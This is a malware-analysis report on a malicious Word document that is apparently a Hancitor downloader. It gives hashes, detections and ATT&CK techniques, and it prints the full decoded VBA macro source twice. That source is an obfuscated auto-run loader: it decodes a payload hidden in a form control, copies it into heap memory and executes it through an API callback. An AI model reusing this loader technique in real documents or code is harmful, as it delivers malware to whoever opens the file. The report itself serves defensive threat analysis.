Office (OLE) malware analysis — malicious · 227373bc40584552

MALICIOUS

Office (OLE)

217.5 KB Created: 2016-10-11 11:21:00 Authoring application: Microsoft Office Word First seen: 2017-10-10

MD5: 0605c9b96be21fe8d1173966a09cea73 SHA-1: 6e151b094f792f1e5e56595544334b7f45dc1f67 SHA-256: 227373bc4058455286d4136f5f8302c847873f2fd4436896ee158b1d47bd8460

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the macros.bas script. The Document_Open macro is present, suggesting it executes upon opening. While the script is heavily obfuscated, the presence of a downloader macro and the ClamAV detection (Doc.Downloader.Hancitor-7051699-0) strongly suggest its purpose is to download and execute a secondary payload. The benign URLs extracted do not provide further IOCs.

Heuristics 4

ClamAV: Doc.Downloader.Hancitor-7051699-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Hancitor-7051699-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim dallas As Integer
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13274 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13274 bytes
SHA-256: `cc5d3efb6fcbed5ceaf90a68ccca0c46eca9e87e8d548cbf72de315ae171edce`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim borrower Dim asclepiadaceous Dim anode Dim aditi Dim detrusion As Long Dim appeach As String Sub HeaderObjectSetup() Dim nText As String nHeaderText = "Nije presa" With ActiveDocument.Sections(1) .Headers(wdHeaderFooterPrimary).Range.Text = nHeaderText End With End Sub Private Sub Document_Open() Dim dallas As Integer Dim mortal As Long millwheel = "exclude" aneurysm = LCase$("DISq") & UCase$("UaLIfiCaTIon") ferial chancroid = 99 legato = 60 If chancroid + legato < 29 Then chancroid = UCase$("LE") & UCase$("EcHeS") aditi = aditi * 4 stupefying = UCase$("ch") & "emilu" & "minescence" Else anode = "operate" legato = 40 End If End Sub Sub ferial() Dim illboding As Integer Dim streptopelia As Variant pointsman = euphonium.unilateralist.ControlTipText distensible = missouri.debasement(pointsman) cerebral = 2 While cerebral < 5 cerebral = cerebral + 1 borrower = "gentry" Wend punt = "pellucidness" parisienne = "confabulation" #If Win64 Then Dim overblown As Byte Dim preferment As dolichocephalic Dim cable As LongPtr preferment.header = 0 Dim cockfighting As String #Else Dim egotism As Variant preferment = 0 Dim tribuneship As Variant Dim cable As Long #End If pranks = 223 - 223 garbage = "arma" indeterminably = 4096 refiner = 87 amberboa = 93 If refiner + amberboa < 39 Then refiner = Left("bibenolin", 2) & Right$("pathlessrthright", 8) detrusion = detrusion And 153 grantinaid = Left("crinovelette", 3) & Mid("cephalopterusminalbandy", 14, 5) & "ity" Else anode = "brae" amberboa = 62 End If Address = 167 + 261977 danaea = africanamerican(Address, preferment, preferment) cable = lovrinac(danaea) ahariolation = "incircumspect" highlow = "har" & LCase$("mlESsly") Dim demonstrable As String whoosh = "qs" demonstrable = sensitiveness slaughterhouse = 7 While slaughterhouse < 11 slaughterhouse = slaughterhouse + 1 asclepiadaceous = "tobbaconist" Wend cursorily = distensible onepan = Mid("disorderedchcatadupe", 11, 2) & Mid("adulteressompinonvolatile", 11, 4) & LCase$("ng") marquetry = "butane" gaucho cable, cursorily canaanitic = UCase$("pRo") & Mid("pistoleercrustcrescendo", 10, 5) & Left("esbandurria", 2) gryllidae = "curvation" #If Win64 Then Dim degenerateness As Long davus = "confirmed" tetrachloride = "metamorphose" adeptness = 47 + 529 #ElseIf (Win32) Then bodywork = "beat" mere = "acuteness" unpermed = 7 + 499 adeptness = unpermed + 1698 #End If Dim lugsail As Byte Dim forage As Integer Dim loquaciousness As Long loquaciousness = 0 Dim midipyrenees As Long midipyrenees = cable + adeptness bey = abysmal(midipyrenees, loquaciousness, demonstrable) cottus = 82 hebetude = 57 If cottus + hebetude < 39 Then cottus = Mid("ninevehautarrowhead", 8, 3) & Left("ochthonescarolinian", 9) borrower = "paces" swim = Left("assopisthognathous", 3) & "evera" & Left("techemistry", 2) Else appeach = appeach hebetude = 51 End If End Sub Function lovrinac(pam) lovrinac = eldorado(pam, 0, 3299) End Function Function sensitiveness() Dim scoot As Variant Dim salebrous As Byte pholas = 96 receiving = 55 If pholas + receiving < 9 Then pholas = Right$("undersizeac", 2) & "cord" anode = anode shirking = Right$("bitternbl", 2) & LCase$("EBbe") & Left("dflatworm", 1) Else detrusion = detrusion And 160 receiving = 49 End If hamburg = ThisDocument.Path sensitiveness = hamburg & "/" & ThisDocument.Name End Function Function gaucho(urocyon, altitudinous) Dim hock As Integer Dim fleeting As Long detrusion = aditi And 249 Dim bifurcated As String Dim sporaceous As Long Dim batta As Byte Dim brightness As Variant Dim bellicose As Long crossness sporaceous, ByVal VarPtr(altitudinous) + 8, 4 anode = "smiles" bellicose = urocyon For korean = 49 To 65 cerulean = 65 detrusion = aditi \ 398 echinodermata = Mid("mylodoncoderogative", 8, 2) & Left("unterintelligencephilister", 17) echinodermata = Mid("aborigineorbursera", 10, 2) & Mid("mitadganitideway", 6, 4) & Mid("visasmconstitutionality", 5, 2) Next korean crossness ByVal bellicose, ByVal sporaceous, 3299 aditi = aditi - 279 End Function Attribute VB_Name = "missouri" 'I can't deal with your lies 'Life has always been a problem #If Win64 Then 'And take my time 'Nothing is real and dies in the lies Public Type dolichocephalic 'I don't fit in 'Life has always been a problem header As LongPtr 'Life is gone 'And take my time End Type 'I won't deal with your lies 'I lost my mind Public Declare PtrSafe Function adventitious Lib "user32" Alias "GetDC" (ByVal carnal As LongPtr) As LongPtr 'Let it all go and in time you will find 'Can't you see? Public Declare PtrSafe Function orzo Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr) 'People have said 'I don't fit in Public Declare PtrSafe Function hyperborean Lib "kernel32" Alias "TlsAlloc" () As LongPtr 'People have said 'I can't escape Public Declare PtrSafe Function hinan Lib "kernel32" Alias "RemoveDirectoryA" (callithricidae As LongPtr) 'I wish I could watch you drown and die 'I wish I could watch you drown and die Public Declare PtrSafe Function africanamerican Lib "kernel32" Alias "HeapCreate" (ByVal empires As LongPtr,incinerate As dolichocephalic, nonsubsistence As dolichocephalic) As LongPtr 'Numb me 'til I won't feel pain again 'Life is gone Public Declare PtrSafe Function egganddart Lib "user32" Alias "EndDialog" (ByVal attenuated As LongPtr,nResult As LongPtr) As LongPtr 'I have no one 'Life has always been a problem Public Declare PtrSafe Function eldorado Lib "ntdll" Alias "RtlAllocateHeap" (ByVal profluence As LongPtr, ByVal taylor As LongPtr, ByVal befogged As LongPtr) As LongPtr 'Let it all go and in time you will find 'The pressure seems to get me down Public Declare PtrSafe Function abysmal Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr 'Fuck all the shit that you hold in your mind 'Life has always been a problem Public Declare PtrSafe Sub crossness Lib "ntdll" Alias "RtlMoveMemory" (checquers As Any, palliament As Any, ByVal dignitatem As LongPtr) 'Life has always been a problem 'And take my time 'Can't you see 'And take my time #Else 'Poisons me with time 'I wish I could watch you drown and die Public Declare Sub crossness Lib "ntdll" Alias "RtlMoveMemory" (analeptic As Any, buna As Any, ByVal acknowledgeable As Long) 'I wish I could watch you drown and die 'It's like a needle in my spine Public Declare Function blase Lib "user32" Alias "GetDC" (arctotis As Long) As Long 'And take my time 'I'm not okay Public Declare Function eldorado Lib "ntdll" Alias "RtlAllocateHeap" (ByVal acrocarpous As Long, ByVal astonished As Long, ByVal murmur As Long) As Long 'I'm not okay 'I wish I could watch you drown and die Public Declare Function abysmal Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal ricin As Any, lParam As Any) As Long 'It's like a needle in my spine 'Life has always been a problem Public Declare Function preservative Lib "user32" Alias "EndDialog" (ByVal lancinate As Long, determent As Long) As Long 'I have no one 'It stings inside Public Declare Function ascomycota Lib "kernel32" Alias "RemoveDirectoryA" (nepotist As Long) 'I don't fit in 'Life has always been a problem Public Declare Function thrill Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long) 'I don't fit in 'Fuck all the shit that you hold in your mind Public Declare Function africanamerican Lib "kernel32" Alias "HeapCreate" (ByVal pundit As Long, ByVal transportation As Long, ByVal unenslaved As Long) As Long 'I don't fit in 'Poisons me with time Public Declare Function anointment Lib "kernel32" Alias "TlsAlloc" () As Long 'I have no one 'Life is gone 'I wish I could watch you drown and die 'I don't fit in #End If 'Poisons me with time 'Life is gone Function rusticate(akin, jordan) rusticate = akin * jordan End Function Function lamaist(discreteness, borated) lamaist = discreteness \ borated End Function Function diadophis(preparedness, knothole) diadophis = preparedness And knothole End Function Sub FormatTables() Dim oTabl As Table For Each oTabl In ActiveDocument.Tables Select Case oTabl.Style Case "Light Shading - Accent 4" oTabl.AutoFitBehavior (wdAutoFitFixed) oTabl.Rows.Alignment = wdAlignRowCenter oTabl.Columns.PreferredWidth = InchesToPoints(0.6) Case "Medium List 2 - Accent 4" oTabl.AutoFitBehavior (wdAutoFitWindow) oTabl.Rows.Alignment = wdAlignRowLeft Case Else oTabl.Style = "Medium List 1 - Accent 4" End Select Next oTabl End Sub Function debasement(rembrandtesque) As String Dim dislocate As Integer Dim ampullar As Long Dim london(63) As Long detrusion = aditi \ 433 Dim leap(63) As Long Dim gle As Long Dim cataplasm As Long Dim arbitrariness As String appeach = appeach Dim discumbency As Long Dim fertilized As Long Dim volva As Variant Dim misology As Long Dim merchant() As Byte Dim catharsis(255) As Byte Dim admiral() As Byte Dim arrogantly(63) As Long triskaidekaphobia = 512 - 449 electrotherapist = 4032 Dim refulgence As Variant navicular = 258048 extispicy = 120 - 56 lightsomeness = 256 icebox = 4096 eg = 337 + 65199 crystallization = 77 + 65203 hierarchy = 16515072 Dim ninny As Long thoth = 149 + 106 peasant = 210 + 261934 Dim ecce As String sunny = 16711680 Dim diagnosis As Long Dim eon() As Byte ReDim eon(4287) haggardly = 61 + 4227 For i = 1 To haggardly albuminuric = Mid(rembrandtesque, i, 1) antagonizing = (Asc(albuminuric)) maxillaria = "patefaction" vulnerable = "anarchistic" eon(i - 1) = antagonizing Next Dim canonize As Byte For cedarn = 27 To 56 inopioe = 56 borrower = "mortuis" mummy = UCase$("Sa") & Right$("puebloguntum", 6) mummy = Right$("selenicereusbo", 2) & Right$("redactionttes", 4) Next cedarn penmen = UBound(eon) extension = 35 For metamere = 0 To penmen eon(metamere) = eon(metamere) + 2 Next metamere custacean = 10 While custacean < 14 gemmation = Right$("abranchiatepa", 2) & Left("ternschonheit", 4) & LCase$("AlisM") myotonia = "backgammon" custacean = custacean + 1 detrusion = aditi * 1 Wend dislocate = 0 anime = 122 blank = 377 - 122 For ampullar = 0 To blank Select Case ampullar Case 65 To 90 catharsis(ampullar) = ampullar - 65 Case 97 To anime catharsis(ampullar) = ampullar - 71 Case 48 To 57 catharsis(ampullar) = ampullar + 4 Case 43 catharsis(ampullar) = 62 Case 47 catharsis(ampullar) = 63 End Select Next ampullar For ampullar = 0 To 63 arrogantly(ampullar) = rusticate(ampullar, extispicy) london(ampullar) = rusticate(ampullar, icebox) leap(ampullar) = rusticate(ampullar, peasant) Next ampullar liriope = 7 While liriope < 11 snapshot = "profluence" costerman = "galantuomo" liriope = liriope + 1 appeach = "alienum" Wend admiral = eon alcoran = 4 ReDim merchant((((UBound(admiral) + 1) \ alcoran) * 3) - 1) whilst = 93 scholarship = 98 If whilst + scholarship < 27 Then whilst = Left("beoutstation", 2) & Left("smearhincodontidae", 4) & LCase$("r") detrusion = aditi * 1 enchymatous = LCase$("mO") & Right$("biotiticnste", 4) & Right$("bernr", 1) Else detrusion = detrusion \ 127 scholarship = 39 End If missay = 3 asclepiadaceous = asclepiadaceous detrusion = detrusion And 172 idolatry = missay + 1 collectively = 2 For fertilized = 0 To UBound(admiral) Step idolatry infamy = admiral(fertilized) cataplasm = leap(catharsis(infamy)) _ + london(catharsis(admiral(fertilized + 1))) + arrogantly(catharsis(admiral(fertilized + 2))) + catharsis(admiral(fertilized + missay)) ampullar = diadophis(cataplasm, sunny) merchant(discumbency) = lamaist(ampullar, eg) ampullar = diadophis(cataplasm, crystallization) merchant(discumbency + 1) = lamaist(ampullar, lightsomeness) merchant(discumbency + collectively) = diadophis(cataplasm, thoth) discumbency = discumbency + collectively + 1 Next fertilized debasement = merchant End Function Attribute VB_Name = "euphonium" Attribute VB_Base = "0{533F6937-932E-4B77-A83F-A72CE37C5C6E}{E3A17BBD-500D-45A9-8407-44B13A27DD85}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "disconsolateness" Attribute VB_Base = "0{19550297-D923-4E9F-A466-DDFCF23686F2}{E9A5762E-E028-489B-B0FE-743DA621682B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: cc5d3efb6fcbed5ceaf90a68ccca0c46eca9e87e8d548cbf72de315ae171edce

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim borrower
Dim asclepiadaceous
Dim anode
Dim aditi
Dim detrusion As Long
Dim appeach As String

Sub HeaderObjectSetup()
  Dim nText As String
  nHeaderText = "Nije presa"
  With ActiveDocument.Sections(1)
    .Headers(wdHeaderFooterPrimary).Range.Text = nHeaderText
  End With
End Sub

Private Sub Document_Open()
Dim dallas As Integer
Dim mortal As Long
millwheel = "exclude"
aneurysm = LCase$("DISq") & UCase$("UaLIfiCaTIon")
ferial
chancroid = 99
legato = 60
If chancroid + legato < 29 Then
chancroid = UCase$("LE") & UCase$("EcHeS")
aditi = aditi * 4
stupefying = UCase$("ch") & "emilu" & "minescence"
Else
anode = "operate"
legato = 40
End If
End Sub
Sub ferial()
Dim illboding As Integer
Dim streptopelia As Variant
pointsman = euphonium.unilateralist.ControlTipText
distensible = missouri.debasement(pointsman)
cerebral = 2
While cerebral < 5
cerebral = cerebral + 1
borrower = "gentry"
Wend

punt = "pellucidness"
parisienne = "confabulation"
#If Win64 Then
Dim overblown As Byte
Dim preferment As dolichocephalic
Dim cable As LongPtr
preferment.header = 0
Dim cockfighting As String
#Else
Dim egotism As Variant
preferment = 0
Dim tribuneship As Variant
Dim cable As Long
#End If
pranks = 223 - 223
garbage = "arma"
indeterminably = 4096
refiner = 87
amberboa = 93
If refiner + amberboa < 39 Then
refiner = Left("bibenolin", 2) & Right$("pathlessrthright", 8)
detrusion = detrusion And 153
grantinaid = Left("crinovelette", 3) & Mid("cephalopterusminalbandy", 14, 5) & "ity"
Else
anode = "brae"
amberboa = 62
End If

Address = 167 + 261977
danaea = africanamerican(Address, preferment, preferment)
cable = lovrinac(danaea)
ahariolation = "incircumspect"
highlow = "har" & LCase$("mlESsly")
Dim demonstrable As String
whoosh = "qs"
demonstrable = sensitiveness
slaughterhouse = 7
While slaughterhouse < 11
slaughterhouse = slaughterhouse + 1
asclepiadaceous = "tobbaconist"
Wend

cursorily = distensible
onepan = Mid("disorderedchcatadupe", 11, 2) & Mid("adulteressompinonvolatile", 11, 4) & LCase$("ng")
marquetry = "butane"
gaucho cable, cursorily
canaanitic = UCase$("pRo") & Mid("pistoleercrustcrescendo", 10, 5) & Left("esbandurria", 2)
gryllidae = "curvation"
#If Win64 Then
Dim degenerateness As Long
davus = "confirmed"
tetrachloride = "metamorphose"
adeptness = 47 + 529
#ElseIf (Win32) Then
bodywork = "beat"
mere = "acuteness"
unpermed = 7 + 499
adeptness = unpermed + 1698

#End If
Dim lugsail As Byte
Dim forage As Integer
Dim loquaciousness As Long
loquaciousness = 0
Dim midipyrenees As Long
midipyrenees = cable + adeptness
bey = abysmal(midipyrenees, loquaciousness, demonstrable)
cottus = 82
hebetude = 57
If cottus + hebetude < 39 Then
cottus = Mid("ninevehautarrowhead", 8, 3) & Left("ochthonescarolinian", 9)
borrower = "paces"
swim = Left("assopisthognathous", 3) & "evera" & Left("techemistry", 2)
Else
appeach = appeach
hebetude = 51
End If

End Sub

Function lovrinac(pam)
lovrinac = eldorado(pam, 0, 3299)
End Function


Function sensitiveness()
Dim scoot As Variant
Dim salebrous As Byte
pholas = 96
receiving = 55
If pholas + receiving < 9 Then
pholas = Right$("undersizeac", 2) & "cord"
anode = anode
shirking = Right$("bitternbl", 2) & LCase$("EBbe") & Left("dflatworm", 1)
Else
detrusion = detrusion And 160
receiving = 49
End If

hamburg = ThisDocument.Path
sensitiveness = hamburg & "/" & ThisDocument.Name
End Function
Function gaucho(urocyon, altitudinous)
Dim hock As Integer
Dim fleeting As Long
detrusion = aditi And 249
Dim bifurcated As String
Dim sporaceous As Long
Dim batta As Byte
Dim brightness As Variant
Dim bellicose As Long
crossness sporaceous, ByVal VarPtr(altitudinous) + 8, 4
anode = "smiles"
bellicose = urocyon
For korean = 49 To 65
cerulean = 65
detrusion = aditi \ 398
echinodermata = Mid("mylodoncoderogative", 8, 2) & Left("unterintelligencephilister", 17)
echinodermata = Mid("aborigineorbursera", 10, 2) & Mid("mitadganitideway", 6, 4) & Mid("visasmconstitutionality", 5, 2)
Next korean

crossness ByVal bellicose, ByVal sporaceous, 3299
aditi = aditi - 279
End Function

Attribute VB_Name = "missouri"
'I can't deal with your lies
'Life has always been a problem
#If Win64 Then
'And take my time
'Nothing is real and dies in the lies
Public Type dolichocephalic
'I don't fit in
'Life has always been a problem
header As LongPtr
'Life is gone
'And take my time
End Type
'I won't deal with your lies
'I lost my mind
Public Declare PtrSafe Function adventitious Lib "user32" Alias "GetDC" (ByVal carnal As LongPtr) As LongPtr
'Let it all go and in time you will find
'Can't you see?
Public Declare PtrSafe Function orzo Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'People have said
'I don't fit in
Public Declare PtrSafe Function hyperborean Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'People have said
'I can't escape
Public Declare PtrSafe Function hinan Lib "kernel32" Alias "RemoveDirectoryA" (callithricidae As LongPtr)
'I wish I could watch you drown and die
'I wish I could watch you drown and die
Public  Declare PtrSafe Function africanamerican Lib "kernel32" Alias "HeapCreate" (ByVal empires As LongPtr,incinerate As dolichocephalic, nonsubsistence As dolichocephalic) As LongPtr
'Numb me 'til I won't feel pain again
'Life is gone
Public Declare PtrSafe Function egganddart Lib "user32" Alias "EndDialog" (ByVal attenuated As LongPtr,nResult As LongPtr) As LongPtr
'I have no one
'Life has always been a problem
Public  Declare PtrSafe Function eldorado Lib "ntdll" Alias "RtlAllocateHeap" (ByVal profluence As LongPtr, ByVal taylor As  LongPtr, ByVal befogged As LongPtr) As LongPtr
'Let it all go and in time you will find
'The pressure seems to get me down
Public  Declare PtrSafe Function abysmal Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'Fuck all the shit that you hold in your mind
'Life has always been a problem
Public  Declare PtrSafe Sub crossness Lib "ntdll" Alias "RtlMoveMemory" (checquers As Any, palliament As Any, ByVal dignitatem As LongPtr)
'Life has always been a problem
'And take my time

'Can't you see
'And take my time
#Else
'Poisons me with time
'I wish I could watch you drown and die
Public Declare Sub crossness Lib "ntdll" Alias "RtlMoveMemory" (analeptic As Any, buna As Any, ByVal acknowledgeable As Long)
'I wish I could watch you drown and die
'It's like a needle in my spine
Public Declare Function blase Lib "user32" Alias "GetDC" (arctotis As Long) As Long
'And take my time
'I'm not okay
Public Declare Function eldorado Lib "ntdll" Alias "RtlAllocateHeap" (ByVal acrocarpous As Long, ByVal astonished As Long, ByVal murmur As Long) As Long
'I'm not okay
'I wish I could watch you drown and die
Public Declare Function abysmal Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal ricin As Any, lParam As Any) As Long
'It's like a needle in my spine
'Life has always been a problem
Public Declare Function preservative Lib "user32" Alias "EndDialog" (ByVal lancinate As Long, determent As Long) As Long
'I have no one
'It stings inside
Public Declare Function ascomycota Lib "kernel32" Alias "RemoveDirectoryA" (nepotist As Long)
'I don't fit in
'Life has always been a problem
Public Declare Function thrill Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'I don't fit in
'Fuck all the shit that you hold in your mind
Public Declare Function africanamerican Lib "kernel32" Alias "HeapCreate" (ByVal pundit As Long, ByVal transportation As Long, ByVal unenslaved As Long) As Long
'I don't fit in
'Poisons me with time
Public Declare Function anointment Lib "kernel32" Alias "TlsAlloc" () As Long
'I have no one
'Life is gone

'I wish I could watch you drown and die
'I don't fit in
#End If
'Poisons me with time
'Life is gone
Function rusticate(akin, jordan)
rusticate = akin * jordan
End Function
Function lamaist(discreteness, borated)
lamaist = discreteness \ borated
End Function
Function diadophis(preparedness, knothole)
diadophis = preparedness And knothole
End Function


Sub FormatTables()
Dim oTabl As Table
For Each oTabl In ActiveDocument.Tables
    Select Case oTabl.Style
        Case "Light Shading - Accent 4"
            oTabl.AutoFitBehavior (wdAutoFitFixed)
            oTabl.Rows.Alignment = wdAlignRowCenter
            oTabl.Columns.PreferredWidth = InchesToPoints(0.6)
        Case "Medium List 2 - Accent 4"
            oTabl.AutoFitBehavior (wdAutoFitWindow)
            oTabl.Rows.Alignment = wdAlignRowLeft
        Case Else
            oTabl.Style = "Medium List 1 - Accent 4"
        End Select
Next oTabl
End Sub

Function debasement(rembrandtesque) As String
Dim dislocate As Integer
Dim ampullar As Long
Dim london(63) As Long
detrusion = aditi \ 433

Dim leap(63) As Long
Dim gle As Long

Dim cataplasm As Long
Dim arbitrariness As String
appeach = appeach

Dim discumbency As Long
Dim fertilized As Long
Dim volva As Variant

Dim misology As Long

Dim merchant() As Byte
Dim catharsis(255) As Byte
Dim admiral() As Byte
Dim arrogantly(63) As Long
triskaidekaphobia = 512 - 449
electrotherapist = 4032
Dim refulgence As Variant

navicular = 258048
extispicy = 120 - 56
lightsomeness = 256
icebox = 4096
eg = 337 + 65199
crystallization = 77 + 65203
hierarchy = 16515072
Dim ninny As Long

thoth = 149 + 106
peasant = 210 + 261934
Dim ecce As String

sunny = 16711680
Dim diagnosis As Long
Dim eon() As Byte
ReDim eon(4287)
haggardly = 61 + 4227
For i = 1 To haggardly
albuminuric = Mid(rembrandtesque, i, 1)
antagonizing = (Asc(albuminuric))
maxillaria = "patefaction"
vulnerable = "anarchistic"
eon(i - 1) = antagonizing
Next
Dim canonize As Byte
For cedarn = 27 To 56
inopioe = 56
borrower = "mortuis"
mummy = UCase$("Sa") & Right$("puebloguntum", 6)
mummy = Right$("selenicereusbo", 2) & Right$("redactionttes", 4)
Next cedarn

penmen = UBound(eon)
extension = 35
For metamere = 0 To penmen
eon(metamere) = eon(metamere) + 2
Next metamere
custacean = 10
While custacean < 14
gemmation = Right$("abranchiatepa", 2) & Left("ternschonheit", 4) & LCase$("AlisM")
myotonia = "backgammon"
custacean = custacean + 1
detrusion = aditi * 1
Wend

dislocate = 0
anime = 122
blank = 377 - 122
For ampullar = 0 To blank
Select Case ampullar
Case 65 To 90
catharsis(ampullar) = ampullar - 65
Case 97 To anime
catharsis(ampullar) = ampullar - 71
Case 48 To 57
catharsis(ampullar) = ampullar + 4
Case 43
catharsis(ampullar) = 62
Case 47
catharsis(ampullar) = 63
End Select
Next ampullar
For ampullar = 0 To 63
arrogantly(ampullar) = rusticate(ampullar, extispicy)
london(ampullar) = rusticate(ampullar, icebox)
leap(ampullar) = rusticate(ampullar, peasant)
Next ampullar
liriope = 7
While liriope < 11
snapshot = "profluence"
costerman = "galantuomo"
liriope = liriope + 1
appeach = "alienum"
Wend

admiral = eon
alcoran = 4
ReDim merchant((((UBound(admiral) + 1) \ alcoran) * 3) - 1)
whilst = 93
scholarship = 98
If whilst + scholarship < 27 Then
whilst = Left("beoutstation", 2) & Left("smearhincodontidae", 4) & LCase$("r")
detrusion = aditi * 1
enchymatous = LCase$("mO") & Right$("biotiticnste", 4) & Right$("bernr", 1)
Else
detrusion = detrusion \ 127
scholarship = 39
End If

missay = 3
asclepiadaceous = asclepiadaceous

detrusion = detrusion And 172

idolatry = missay + 1
collectively = 2
For fertilized = 0 To UBound(admiral) Step idolatry
infamy = admiral(fertilized)
cataplasm = leap(catharsis(infamy)) _
 + london(catharsis(admiral(fertilized + 1))) + arrogantly(catharsis(admiral(fertilized + 2))) + catharsis(admiral(fertilized + missay))
ampullar = diadophis(cataplasm, sunny)
merchant(discumbency) = lamaist(ampullar, eg)
ampullar = diadophis(cataplasm, crystallization)
merchant(discumbency + 1) = lamaist(ampullar, lightsomeness)
merchant(discumbency + collectively) = diadophis(cataplasm, thoth)
discumbency = discumbency + collectively + 1
Next fertilized
debasement = merchant
End Function



Attribute VB_Name = "euphonium"
Attribute VB_Base = "0{533F6937-932E-4B77-A83F-A72CE37C5C6E}{E3A17BBD-500D-45A9-8407-44B13A27DD85}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "disconsolateness"
Attribute VB_Base = "0{19550297-D923-4E9F-A466-DDFCF23686F2}{E9A5762E-E028-489B-B0FE-743DA621682B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.